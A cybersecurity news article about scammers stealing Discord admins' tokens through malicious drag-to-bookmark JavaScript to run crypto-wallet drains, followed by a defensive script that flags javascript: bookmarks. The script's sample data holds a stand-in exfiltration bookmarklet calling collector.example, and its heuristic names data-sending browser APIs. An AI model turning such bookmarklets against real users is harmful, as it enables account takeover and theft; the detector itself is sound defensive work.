Discord Group Admins Losing Their Accounts En Masse in Browser Bookmark Attacks

Written by Emma Davis

Cybercriminals hack the accounts of administrators of Discord servers and steal cryptocurrency from their accounts using malicious browser bookmarks.

Several Discord crypto communities have been affected in the recent wave of attacks, including Aura Network, MetrixCoin, and Nahmii.

Let me remind you that we also talked about the fact that 17 malicious npm packages stole Discord tokens, and also that the PyPI repository got rid of 11 packages that were stealing Discord tokens and passwords.

And more recently, the media wrote that CAPTCHA in Discord Asks Users to Find Non-Existent Objects Created by AI.

Hackers usually target Discord communities where members discuss cryptocurrencies, but this time the attackers are going after the admin accounts of those groups. According to Brian Krebs of KrebsOnSecurity, cybercriminals take over accounts by getting victims to execute malicious JavaScript code. To get users to run the code, the attackers disguise it as a seemingly innocuous browser bookmark.

Attackers use a deceptive strategy by inserting JavaScript into browser bookmarks using the drag and drop feature on web pages.

Group admins have reported receiving interview requests from individuals posing as reporters from cryptocurrency news outlets. Once the victims agree to be interviewed, they are redirected to a fake Discord server that mimics a news release.

Administrators are then asked to verify their identity by dragging a link from the server to the browser’s bookmarks bar. Victims believe this action is part of the verification process, then return to Discord.com and click on the new bookmark.

What the victims didn’t know, however, was that the bookmark was a well-written piece of JavaScript code. The snippet stealthily extracts the victim’s Discord token and sends it to the attacker’s website.

The scammer then loads the token into his own browser session and proceeds to post exclusive NFT news in the target Discord group. These announcements are designed to attract naive participants who are confident in the legitimacy of the messages.

The victims are then prompted to connect their crypto wallets to the web address provided by the attacker and grant unlimited permissions to use their tokens. Consequently, the hacker successfully withdraws funds from compromised accounts. To cover their tracks, the attacker promptly deletes messages and bans users who are trying to expose fraud.

The stolen token remains usable by the attacker until the original owner logs out or changes their credentials. This is how a cybercriminal can use a hacked account without arousing suspicion.

According to Krebs, an Ocean Protocol employee was the victim of this attack. On May 22, the Ocean Protocol Discord server admin clicked on a link sent in private messages from a community member. The administrator was then asked to verify their identity by dragging the link to the web browser’s bookmarks bar. Even though Multi-Factor Authentication (MFA) was enabled, the employee’s account was hacked.

The attackers waited until midnight in the victim’s time zone before using the account, to reduce the chance of detection. The hackers then used the hacked account to send a message announcing a new Ocean giveaway. Eventually, the victim contacted the operator of the server hosting the channel and the settings were returned to normal.

Discord admin accounts in cryptocurrency-focused communities have become a prime target for scammers using malicious JavaScript bookmarks. Attackers take advantage of the trust of Discord administrators by tricking them into executing code disguised as browser bookmarks.

With this deceptive strategy, the scammers gain access to victims’ Discord tokens, allowing them to perform fraudulent activities, such as debiting hacked accounts. It is extremely important for Discord users, especially administrators, to be careful about such attacks.
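One way to check a workstation for the kind of bookmark described above is to list every saved bookmark whose URL uses the `javascript:` scheme. The following is an added example, not code from the original article or from KrebsOnSecurity; it assumes a Chromium-style `Bookmarks` JSON tree, and the sample data, the `collector.example` host and the `SENDS_DATA` heuristic are constructed for illustration.

```javascript
// Added example: list javascript: bookmarks in a Chromium-format bookmarks tree.
// The node layout (roots/children/type/url) follows Chromium's "Bookmarks" JSON
// file; SAMPLE is constructed for illustration and is not from the article.
const SAMPLE = {
  roots: {
    bookmark_bar: { type: "folder", name: "Bookmarks bar", children: [
      { type: "url", name: "Discord", url: "https://discord.com/app" },
      { type: "url", name: "Verify", url: "JavaScript:fetch('https://collector.example/?d='+document.title)" },
    ]},
    other: { type: "folder", name: "Other bookmarks", children: [
      { type: "folder", name: "Tools", children: [
        { type: "url", name: "Dark mode", url: " java\tscript:document.body.style.background='%23000'" },
      ]},
    ]},
  },
};

// Assumed triage heuristic: APIs a bookmarklet could use to transmit data.
const SENDS_DATA = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b/;

// Parse with the WHATWG URL parser (the one browsers use) so that mixed case,
// leading spaces and embedded tabs/newlines in the scheme are normalized.
function schemeOf(raw) {
  try { return new URL(raw).protocol; } catch { return null; }
}

// Depth-first walk yielding every URL bookmark with its folder path.
function* walk(node, path) {
  if (!node || typeof node !== "object") return;
  const here = node.name ? [...path, node.name] : path;
  if (node.type === "url") yield { path: here.join(" / "), url: String(node.url || "") };
  for (const child of node.children || []) yield* walk(child, here);
}

function findScriptBookmarks(bookmarks) {
  const findings = [];
  for (const root of Object.values(bookmarks.roots || {})) {
    for (const { path, url } of walk(root, [])) {
      if (schemeOf(url) !== "javascript:") continue;
      let body = url.slice(url.indexOf(":") + 1);
      try { body = decodeURIComponent(body); } catch { /* keep raw body */ }
      findings.push({ path, sendsData: SENDS_DATA.test(body), length: body.length });
    }
  }
  return findings;
}

console.log(findScriptBookmarks(SAMPLE));
```

Every hit deserves a manual look on an administrator's machine; `sendsData` only helps decide which ones to review first.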


About the author

Emma Davis

I'm a writer and content manager (a short time ago I completed a bachelor's degree in Marketing from Gustavus Adolphus College). For now, I have a deep drive to study cyber security.
